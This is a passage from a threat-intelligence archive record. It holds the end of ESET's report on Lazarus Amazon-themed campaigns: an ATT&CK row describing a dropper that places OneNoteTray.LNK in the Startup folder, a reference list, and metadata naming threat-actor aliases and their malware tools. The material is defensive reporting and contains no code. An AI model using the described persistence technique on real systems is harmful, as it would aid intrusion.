under\r\nHKLM\\SYSTEM\\CurrentControlSet\\Services\\\u003cname\u003e.\r\nhttps://www.welivesecurity.com/2022/09/30/amazon-themed-campaigns-lazarus-netherlands-belgium/\r\nPage 11 of 13\n\nTactic ID Name Description\r\nT1547.001\r\nBoot or Logon Autostart\r\nExecution: Startup Folder\r\nThe dropper of the HTTP(S) downloader creates a LNK\r\nfile OneNoteTray.LNK in the Startup folder.\r\nReferences\r\nAhnlab. Analysis Report on Lazarus Group’s Rootkit Attack Using BYOVD. Vers. 1.0. 22 September 2022. Retrieved from\r\nAhnLab Security Emergency Response Center.\r\nAhnlab. (2021, June 4). APT Attacks on Domestic Companies Using Library Files. Retrieved from AhnLab Security\r\nEmergency Response Center.\r\nAhnlab. (2022, September 22). Analysis Report on Lazarus Group’s Rootkit Attack Using BYOVD. Retrieved from AhnLab\r\nSecurity Emergency Response Center.\r\nBreitenbacher, D., \u0026 Kaspars, O. (2020, June). Operation In(ter)ception: Aerospace and military companies in the crosshairs\r\nof cyberspies. Retrieved from WeLiveSecurity.com.\r\nClearSky Research Team. (2020, August 13). Operation ‘Dream Job’ Widespread North Korean Espionage Campaign.\r\nRetrieved from ClearSky.com.\r\nDekel, K. (n.d.). Sentinel Labs Security Research. CVE-2021-21551- Hundreds Of Millions Of Dell Computers At Risk Due\r\nto Multiple BIOS Driver Privilege Escalation Flaws. Retrieved from SentinelOne.com.\r\nESET. (2021, June 3). ESET Threat Report T 1 2021. Retrieved from WeLiveSecurity.com.\r\nGReAT. (2016, August 16). The Equation giveaway. Retrieved from SecureList.com.\r\nHvS-Consulting AG. (2020, December 15). Greetings from Lazarus: Anatomy of a cyber-espionage campaign. Retrieved\r\nfrom hvs-consulting.de.\r\nCherepanov, A., \u0026 Kálnai, P. (2020, November). Lazarus supply-chain attack in South Korea. Retrieved\r\nfrom WeLiveSecurity.com.\r\nKálnai, P. (2017, 2 17). Demystifying targeted malware used against Polish banks. (ESET) Retrieved from\r\nWeLiveSecurity.com.\r\nKopeytsev, V., \u0026 Park, S. (2021, February). Lazarus targets defense industry with ThreatNeedle. (Kaspersky Lab) Retrieved\r\nfrom SecureList.com.\r\nLee, T.-w., Dong-wook, \u0026 Kim, B.-j. (2021). Operation BookCode - Targeting South Korea. Virus Bulletin. localhost.\r\nRetrieved from vblocalhost.com.\r\nMaclachlan, J., Potaczek, M., Isakovic, N., Williams, M., \u0026 Gupta, Y. (2022, September 14). It's Time to PuTTY! DPRK\r\nJob Opportunity Phishing via WhatsApp. Retrieved from Mandiant.com.\r\nTomonaga, S. (2020, September 29). BLINDINGCAN - Malware Used by Lazarus. (JPCERT/CC) Retrieved from\r\nblogs.jpcert.or.jp.\r\nUS-CERT CISA. (2020, August 19). MAR-10295134-1.v1 – North Korean Remote Access Trojan: BLINDINGCAN.\r\n(CISA) Retrieved from cisa.gov.\r\nWeidemann, A. (2021, 1 25). New campaign targeting security researchers. (Google Threat Analysis Group) Retrieved from\r\nblog.google.\r\nWu, H. (2008). The Stream Cipher HC-128. In M. Robshaw , \u0026 O. Billet , New Stream Cipher Designs (Vol. 4986). Berlin,\r\nHeidelberg: Springer. Retrieved from doi.org.\r\nhttps://www.welivesecurity.com/2022/09/30/amazon-themed-campaigns-lazarus-netherlands-belgium/\r\nPage 12 of 13\n\nSource: https://www.welivesecurity.com/2022/09/30/amazon-themed-campaigns-lazarus-netherlands-belgium/\r\nhttps://www.welivesecurity.com/2022/09/30/amazon-themed-campaigns-lazarus-netherlands-belgium/\r\nPage 13 of 13", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "ETDA" ], "references": [ "https://www.welivesecurity.com/2022/09/30/amazon-themed-campaigns-lazarus-netherlands-belgium/" ], "report_names": [ "amazon-themed-campaigns-lazarus-netherlands-belgium" ], "threat_actors": [ { "id": "b740943a-da51-4133-855b-df29822531ea", "created_at": "2022-10-25T15:50:23.604126Z", "updated_at": "2026-04-10T02:00:05.259593Z", "deleted_at": null, "main_name": "Equation", "aliases": [ "Equation" ], "source_name": "MITRE:Equation", "tools": null, "source_id": "MITRE", "reports": null }, { "id": "34eea331-d052-4096-ae03-a22f1d090bd4", "created_at": "2025-08-07T02:03:25.073494Z", "updated_at": "2026-04-10T02:00:03.709243Z", "deleted_at": null, "main_name": "NICKEL ACADEMY", "aliases": [ "ATK3 ", "Black Artemis ", "COVELLITE ", "CTG-2460 ", "Citrine Sleet ", "Diamond Sleet ", "Guardians of Peace", "HIDDEN COBRA ", "High Anonymous", "Labyrinth Chollima ", "Lazarus Group ", "NNPT Group", "New Romanic Cyber Army Team", "Temp.Hermit ", "UNC577 ", "Who Am I?", "Whois Team", "ZINC " ], "source_name": "Secureworks:NICKEL ACADEMY", "tools": [ "Destover", "KorHigh", "Volgmer" ], "source_id": "Secureworks", "reports": null }, { "id": "732597b1-40a8-474c-88cc-eb8a421c29f1", "created_at": "2025-08-07T02:03:25.087732Z", "updated_at": "2026-04-10T02:00:03.776007Z", "deleted_at": null, "main_name": "NICKEL GLADSTONE", "aliases": [ "APT38 ", "ATK 117 ", "Alluring Pisces ", "Black Alicanto ", "Bluenoroff ", "CTG-6459 ", "Citrine Sleet ", "HIDDEN COBRA ", "Lazarus Group", "Sapphire Sleet ", "Selective Pisces ", "Stardust Chollima ", "T-APT-15 ", "TA444 ", "TAG-71 " ], "source_name": "Secureworks:NICKEL GLADSTONE", "tools": [ "AlphaNC", "Bankshot", "CCGC_Proxy", "Ratankba", "RustBucket", "SUGARLOADER", "SwiftLoader", "Wcry" ], "source_id": "Secureworks", "reports": null }, { "id": "a2b92056-9378-4749-926b-7e10c4500dac", "created_at": "2023-01-06T13:46:38.430595Z", "updated_at": "2026-04-10T02:00:02.971571Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "Operation DarkSeoul", "Bureau 121", "Group 77", "APT38", "NICKEL GLADSTONE", "G0082", "COPERNICIUM", "Moonstone Sleet", "Operation GhostSecret", "APT 38", "Appleworm", "Unit 121", "ATK3", "G0032", "ATK117", "NewRomanic Cyber Army Team", "Nickel Academy", "Sapphire Sleet", "Lazarus group", "Hastati Group", "Subgroup: Bluenoroff", "Operation Troy", "Black Artemis", "Dark Seoul", "Andariel", "Labyrinth Chollima", "Operation AppleJeus", "COVELLITE", "Citrine Sleet", "DEV-0139", "DEV-1222", "Hidden Cobra", "Bluenoroff", "Stardust Chollima", "Whois Hacking Team", "Diamond Sleet", "TA404", "BeagleBoyz", "APT-C-26" ], "source_name": "MISPGALAXY:Lazarus Group", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "32a223a8-3c79-4146-87c5-8557d38662ae", "created_at": "2022-10-25T15:50:23.703698Z", "updated_at": "2026-04-10T02:00:05.261989Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "Lazarus Group", "Labyrinth Chollima", "HIDDEN COBRA", "Guardians of Peace", "NICKEL ACADEMY", "Diamond Sleet" ], "source_name": "MITRE:Lazarus Group", "tools": [ "RawDisk", "Proxysvc", "BADCALL", "FALLCHILL", "WannaCry", "MagicRAT", "HOPLIGHT", "TYPEFRAME", "Dtrack", "HotCroissant", "HARDRAIN", "Dacls", "KEYMARBLE", "TAINTEDSCRIBE", "AuditCred", "netsh", "ECCENTRICBANDWAGON", "AppleJeus", "BLINDINGCAN", "ThreatNeedle", "Volgmer", "Cryptoistic", "RATANKBA", "Bankshot" ], "source_id": "MITRE", "reports": null }, { "id": "f32df445-9fb4-4234-99e0-3561f6498e4e", "created_at": "2022-10-25T16:07:23.756373Z", "updated_at": "2026-04-10T02:00:04.739611Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "APT-C-26", "ATK 3", "Appleworm", "Citrine Sleet", "DEV-0139", "Diamond Sleet", "G0032", "Gleaming Pisces", "Gods Apostles", "Gods Disciples", "Group 77", "Guardians of Peace", "Hastati Group", "Hidden Cobra", "ITG03", "Jade Sleet", "Labyrinth Chollima", "Lazarus Group", "NewRomanic Cyber Army Team", "Operation 99", "Operation AppleJeus", "Operation AppleJeus sequel", "Operation Blockbuster: Breach of Sony Pictures Entertainment", "Operation CryptoCore", "Operation Dream Job", "Operation Dream Magic", "Operation Flame", "Operation GhostSecret", "Operation In(ter)caption", "Operation LolZarus", "Operation Marstech Mayhem", "Operation No Pineapple!", "Operation North Star", "Operation Phantom Circuit", "Operation Sharpshooter", "Operation SyncHole", "Operation Ten Days of Rain / DarkSeoul", "Operation Troy", "SectorA01", "Slow Pisces", "TA404", "TraderTraitor", "UNC2970", "UNC4034", "UNC4736", "UNC4899", "UNC577", "Whois Hacking Team" ], "source_name": "ETDA:Lazarus Group", "tools": [ "3CX Backdoor", "3Rat Client", "3proxy", "AIRDRY", "ARTFULPIE", "ATMDtrack", "AlphaNC", "Alreay", "Andaratm", "AngryRebel", "AppleJeus", "Aryan", "AuditCred", "BADCALL", "BISTROMATH", "BLINDINGCAN", "BTC Changer", "BUFFETLINE", "BanSwift", "Bankshot", "Bitrep", "Bitsran", "BlindToad", "Bookcode", "BootWreck", "BottomLoader", "Brambul", "BravoNC", "Breut", "COLDCAT", "COPPERHEDGE", "CROWDEDFLOUNDER", "Castov", "CheeseTray", "CleanToad", "ClientTraficForwarder", "CollectionRAT", "Concealment Troy", "Contopee", "CookieTime", "Cyruslish", "DAVESHELL", "DBLL Dropper", "DLRAT", "DRATzarus", "DRATzarus RAT", "Dacls", "Dacls RAT", "DarkComet", "DarkKomet", "DeltaCharlie", "DeltaNC", "Dembr", "Destover", "DoublePulsar", "Dozer", "Dtrack", "Duuzer", "DyePack", "ECCENTRICBANDWAGON", "ELECTRICFISH", "Escad", "EternalBlue", "FALLCHILL", "FYNLOS", "FallChill RAT", "Farfli", "Fimlis", "FoggyBrass", "FudModule", "Fynloski", "Gh0st RAT", "Ghost RAT", "Gopuram", "HARDRAIN", "HIDDEN COBRA RAT/Worm", "HLOADER", "HOOKSHOT", "HOPLIGHT", "HOTCROISSANT", "HOTWAX", "HTTP Troy", "Hawup", "Hawup RAT", "Hermes", "HotCroissant", "HotelAlfa", "Hotwax", "HtDnDownLoader", "Http Dr0pper", "ICONICSTEALER", "Joanap", "Jokra", "KANDYKORN", "KEYMARBLE", "Kaos", "KillDisk", "KillMBR", "Koredos", "Krademok", "LIGHTSHIFT", "LIGHTSHOW", "LOLBAS", "LOLBins", "Lazarus", "LightlessCan", "Living off the Land", "MATA", "MBRkiller", "MagicRAT", "Manuscrypt", "Mimail", "Mimikatz", "Moudour", "Mydoom", "Mydoor", "Mytob", "NACHOCHEESE", "NachoCheese", "NestEgg", "NickelLoader", "NineRAT", "Novarg", "NukeSped", "OpBlockBuster", "PCRat", "PEBBLEDASH", "PLANKWALK", "POOLRAT", "PSLogger", "PhanDoor", "Plink", "PondRAT", "PowerBrace", "PowerRatankba", "PowerShell RAT", "PowerSpritz", "PowerTask", "Preft", "ProcDump", "Proxysvc", "PuTTY Link", "QUICKRIDE", "QUICKRIDE.POWER", "Quickcafe", "QuiteRAT", "R-C1", "ROptimizer", "Ratabanka", "RatabankaPOS", "Ratankba", "RatankbaPOS", "RawDisk", "RedShawl", "Rifdoor", "Rising Sun", "Romeo-CoreOne", "RomeoAlfa", "RomeoBravo", "RomeoCharlie", "RomeoCore", "RomeoDelta", "RomeoEcho", "RomeoFoxtrot", "RomeoGolf", "RomeoHotel", "RomeoMike", "RomeoNovember", "RomeoWhiskey", "Romeos", "RustBucket", "SHADYCAT", "SHARPKNOT", "SIGFLIP", "SIMPLESEA", "SLICKSHOES", "SORRYBRUTE", "SUDDENICON", "SUGARLOADER", "SheepRAT", "SierraAlfa", "SierraBravo", "SierraCharlie", "SierraJuliett-MikeOne", "SierraJuliett-MikeTwo", "SimpleTea", "SimplexTea", "SmallTiger", "Stunnel", "TAINTEDSCRIBE", "TAXHAUL", "TFlower", "TOUCHKEY", "TOUCHMOVE", "TOUCHSHIFT", "TOUCHSHOT", "TWOPENCE", "TYPEFRAME", "Tdrop", "Tdrop2", "ThreatNeedle", "Tiger RAT", "TigerRAT", "Trojan Manuscript", "Troy", "TroyRAT", "VEILEDSIGNAL", "VHD", "VHD Ransomware", "VIVACIOUSGIFT", "VSingle", "ValeforBeta", "Volgmer", "Vyveva", "W1_RAT", "Wana Decrypt0r", "WanaCry", "WanaCrypt", "WanaCrypt0r", "WannaCry", "WannaCrypt", "WannaCryptor", "WbBot", "Wcry", "Win32/KillDisk.NBB", "Win32/KillDisk.NBC", "Win32/KillDisk.NBD", "Win32/KillDisk.NBH", "Win32/KillDisk.NBI", "WinorDLL64", "Winsec", "WolfRAT", "Wormhole", "YamaBot", "Yort", "ZetaNile", "concealment_troy", "http_troy", "httpdr0pper", "httpdropper", "klovbot", "sRDI" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434527, "ts_updated_at": 1775792300, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/4b8619effdbc24352c4c1a3d88459d130f2109bd.pdf", "text": "https://archive.orkl.eu/4b8619effdbc24352c4c1a3d88459d130f2109bd.txt", "img": "https://archive.orkl.eu/4b8619effdbc24352c4c1a3d88459d130f2109bd.jpg" } }